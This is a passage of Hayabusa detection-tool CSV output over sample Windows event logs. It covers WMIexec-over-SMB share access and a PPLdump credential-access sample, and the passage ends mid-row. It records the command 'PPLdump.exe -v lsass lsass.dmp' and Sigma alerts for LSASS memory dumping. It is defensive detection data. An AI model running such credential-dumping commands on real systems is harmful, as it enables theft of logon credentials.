0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.282 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,LatMov,SMB Create Remote File Admin Share,,../hayabusa-rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c318,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c326,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c336,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c318,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c326,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 
0x18c336,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 
0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 
0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PPLdump.exe -v lsass lsass.dmp | Process: C:\Users\IEUser\Desktop\PPLdump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xbce3a | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:25.417 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 
6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:25.418 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:25.427 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1400 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 592 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010885D0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PPLdump.exe -v lsass lsass.dmp | LID: 0x3e7 | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent 
Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.083 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x103801 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.084 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\csrss.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 504 | Src PGUID: 747F3D96-6E19-6082-0000-0010E5580000 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.dmp | Process: C:\Windows\system32\services.exe | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.163 
+09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx 2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\services.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 7188 | Src PGUID: 747F3D96-F416-6081-0000-001033034A00 | Tgt PID: 652 | Tgt PGUID: 